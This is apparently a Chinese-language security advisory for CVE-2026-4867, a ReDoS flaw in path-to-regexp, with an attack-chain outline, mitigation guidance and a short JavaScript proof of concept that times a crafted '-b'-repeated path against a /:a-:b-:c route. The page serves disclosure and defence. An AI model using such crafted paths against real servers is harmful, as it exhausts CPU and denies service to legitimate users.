CVE-2026-4867 CVSS 7.5 高危

CVE-2026-4867 path-to-regexp 正则表达式拒绝服务漏洞

披露日期: 2026-03-26

来源: ce714d77-add3-4f53-aff5-83d477b104bb

漏洞信息

漏洞编号

CVE-2026-4867

漏洞类型

正则表达式拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

path-to-regexp

漏洞概述

path-to-regexp 是一个用于将路径字符串转换为正则表达式的流行库。在特定版本中，当路由定义包含单个片段内的三个或更多参数（例如 /:a-:b-:c）时，会生成错误的正则表达式。尽管之前的版本添加了回溯保护，但该保护仅针对两个参数有效。在三个或更多参数的情况下，生成的正则表达式无法阻止单个分隔符，导致捕获组重叠，进而引发灾难性的回溯。攻击者可以通过发送特制的恶意请求利用此漏洞，导致服务器资源耗尽，从而引发拒绝服务。

技术细节

该漏洞源于 path-to-regexp 库在处理复杂路由参数时的正则表达式生成逻辑缺陷。当路由路径中存在三个或更多由非点号（如连字符 -）分隔的参数时（例如 /:a-:b-:c），库生成的正则表达式未能正确处理边界条件。虽然 [email protected] 引入了回溯保护，但其逻辑仅覆盖了双参数场景。在多参数场景下，生成的 Lookahead 断言无法匹配单个分隔符，导致正则引擎在匹配失败时需要进行大量的回溯尝试。攻击者利用此漏洞的方式相对简单，只需构造一个包含特定参数分隔符的长字符串作为 URL 路径发送给服务器。当路由匹配器尝试解析该路径时，正则表达式引擎将陷入指数级的时间复杂度计算，导致 CPU 占用率飙升至 100%，服务响应变慢甚至完全崩溃。

攻击链分析

STEP 1

侦察

攻击者识别目标应用是否使用了受影响版本的 path-to-regexp 库，并寻找包含多参数路由的端点。

STEP 2

构造攻击载荷

攻击者构造一个包含大量重复分隔符（如 -）的恶意 URL 路径，针对存在三个或更多参数的路由模式。

STEP 3

发送请求

攻击者向服务器发送该恶意 HTTP 请求。

STEP 4

触发漏洞

服务器尝试使用生成的正则表达式匹配该路径，由于存在缺陷，正则引擎发生灾难性回溯。

STEP 5

达成拒绝服务

服务器 CPU 资源被耗尽，无法处理其他正常用户的请求，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-4867: ReDoS in path-to-regexp < 0.1.13
const pathToRegexp = require('path-to-regexp');

// Vulnerable pattern: 3 params separated by a non-dot character
const routePattern = '/:a-:b-:c';
const re = pathToRegexp(routePattern);

// Malicious payload designed to cause catastrophic backtracking
// Using a long string of segments separated by the delimiter
const maliciousPayload = '/a' + '-b'.repeat(30) + '-c';

console.time('Regex Match');
try {
    const match = re.exec(maliciousPayload);
    console.log('Matched:', match);
} catch (e) {
    console.error('Error during match:', e);
}
console.timeEnd('Regex Match');

影响范围

path-to-regexp < 0.1.13

防御指南

临时缓解措施

如果无法立即升级，可以通过重写路由路径来规避风险。具体做法是将容易产生歧义的路由参数（如 /:a-:b-:c）修改为使用自定义正则表达式明确限制匹配范围的形式（例如 /:a-:b([^-/]+)-:c([^-/]+)），确保捕获组不会重叠。另外，限制传入请求的 URL 长度可以减轻攻击带来的影响。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4867
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4867
3 Details https://www.cvedetails.com/cve/CVE-2026-4867/
4 VulDB https://vuldb.com/cve/CVE-2026-4867
5 Link https://blakeembrey.com/posts/2024-09-web-redos
6 Link https://cna.openjsf.org/security-advisories.html
7 Link https://github.com/advisories/GHSA-9wv6-86v2-598j

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表